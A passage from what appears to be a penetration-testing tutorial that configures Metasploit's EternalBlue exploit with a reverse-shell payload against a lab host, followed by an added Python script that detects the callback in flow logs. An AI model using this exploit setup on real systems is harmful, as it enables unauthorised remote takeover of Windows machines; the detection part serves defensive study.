After the recon phase, we have all the information we need on our victim to start exploiting the target.
First, we will start the Metasploit database (PostgreSQL) using this command:
┌──(kali㉿kali)-[~]
└─$ systemctl start postgresql
To check that the service has started, we will use the command:
┌──(kali㉿kali)-[~]
└─$ systemctl status postgresql
After successfully starting the Metasploit database, let's start Metasploit itself:
┌──(kali㉿kali)-[~]
└─$ msfconsole
Starting the Metasploit Framework console.../
=[ metasploit v6.0.41-dev ]
+ -- --=[ 2122 exploits - 1138 auxiliary - 360 post ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops ]
+ -- --=[ 8 evasion ]
Metasploit tip: Display the Framework log using the
log command, learn more with help log
msf6 >
Once Metasploit has opened successfully, we can search for the EternalBlue exploit using the search command:
msf6 > search eternal blue
Matching Modules
================

   #  Name                                           Disclosure Date  Rank     Check  Description
   -  ----                                           ---------------  ----     -----  -----------
   0  exploit/windows/smb/ms17_010_eternalblue       2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   1  exploit/windows/smb/ms17_010_eternalblue_win8  2017-03-14       average  No     MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
   2  exploit/windows/smb/ms17_010_psexec            2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
   3  auxiliary/admin/smb/ms17_010_command           2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   4  auxiliary/scanner/smb/smb_ms17_010                              normal   No     MS17-010 SMB RCE Detection
   5  exploit/windows/smb/smb_doublepulsar_rce       2017-04-14       great    Yes    SMB DOUBLEPULSAR Remote Code Execution
We will choose the first option, which is number 0 (because numbering in computers starts from 0).
After choosing the right exploit for our victim, we load it and Metasploit attaches a payload, like so:
msf6 > use 0
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) >
For this victim I will use the default payload for this exploit.
After choosing the exploit and the payload, we can view the options and customize them for our specific needs:
msf6 exploit(windows/smb/ms17_010_eternalblue) > options
Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   RHOSTS                          yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT          445              yes       The target port (TCP)
   SMBDomain      .                no        (Optional) The Windows domain to use for authentication
   SMBPass                         no        (Optional) The password for the specified username
   SMBUser                         no        (Optional) The username to authenticate as
   VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target.
   VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target.


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.88.149   yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows 7 and Server 2008 R2 (x64) All Service Packs
Next, we will set our victim's IP by using the command "set RHOST <IP>" (Metasploit accepts RHOST as an alias for the RHOSTS option listed above):
msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhost 192.168.2.104
rhost => 192.168.2.104
After defining our victim's IP, we will set LHOST to our local machine's address:
msf6 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 192.168.2.149
LHOST => 192.168.2.149
Now we will specify the LPORT (local port). I will use port 2323, but it does not really matter which port, as long as it is not already in use (SSH, FTP, etc.):
msf6 exploit(windows/smb/ms17_010_eternalblue) > set LPORT 2323
LPORT => 2323
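The configuration above (a reverse_tcp payload calling back from the victim to LHOST on LPORT 2323) leaves a recognizable pattern in network flow logs: a host that has just accepted an inbound SMB (445) connection immediately dials out to an unusual port. As an added example that is not part of the original post, here is detection logic a defender could run over such logs. The flow-log format and sample records are constructed for this example, the IP addresses are the ones used above, and the set of expected egress ports is an assumption to tune per environment.

```python
from datetime import datetime, timedelta

# Constructed sample flow records (not real logs): "timestamp src:port -> dst:port proto".
# 192.168.2.149 is the attacker box (LHOST) and 192.168.2.104 the victim (RHOST) from above.
SAMPLE_FLOWS = """\
2021-05-01T10:00:01 192.168.2.149:51234 -> 192.168.2.104:445 tcp
2021-05-01T10:00:02 192.168.2.149:51235 -> 192.168.2.104:445 tcp
2021-05-01T10:00:04 192.168.2.104:49160 -> 192.168.2.149:2323 tcp
2021-05-01T10:05:00 192.168.2.104:49161 -> 192.168.2.10:53 udp
2021-05-01T11:00:00 192.168.2.50:40000 -> 192.168.2.104:445 tcp
2021-05-01T11:30:00 192.168.2.104:49170 -> 192.168.2.20:443 tcp
"""

# Assumption: ports a file server is normally expected to dial out to (DNS, HTTP(S), Kerberos, LDAP).
EXPECTED_EGRESS_PORTS = {53, 80, 443, 88, 389}


def parse_flow(line):
    """Parse one constructed flow line into a dict with typed fields."""
    ts, src, _, dst, proto = line.split()
    sip, sport = src.rsplit(":", 1)
    dip, dport = dst.rsplit(":", 1)
    return {"ts": datetime.fromisoformat(ts), "src": sip, "sport": int(sport),
            "dst": dip, "dport": int(dport), "proto": proto}


def detect_smb_callbacks(text, window_seconds=30):
    """Alert when a host that just received an inbound SMB connection opens an
    outbound TCP connection to a non-standard port within window_seconds.
    The alert also records whether the callback goes to the same peer that
    spoke SMB to the victim, which is the reverse_tcp case from this post."""
    flows = [parse_flow(line) for line in text.strip().splitlines()]
    last_inbound_smb = {}  # victim ip -> (timestamp, smb client ip)
    alerts = []
    for f in flows:
        if f["proto"] == "tcp" and f["dport"] == 445:
            last_inbound_smb[f["dst"]] = (f["ts"], f["src"])
            continue
        hit = last_inbound_smb.get(f["src"])
        if (hit and f["proto"] == "tcp" and f["dport"] not in EXPECTED_EGRESS_PORTS
                and f["ts"] - hit[0] <= timedelta(seconds=window_seconds)):
            alerts.append({"victim": f["src"], "callback_to": f["dst"],
                           "port": f["dport"], "smb_client": hit[1],
                           "same_peer": hit[1] == f["dst"]})
    return alerts
```

On the sample records only the 192.168.2.104 -> 192.168.2.149:2323 flow two seconds after the SMB connection is flagged; the DNS and HTTPS flows and the later SMB session do not match.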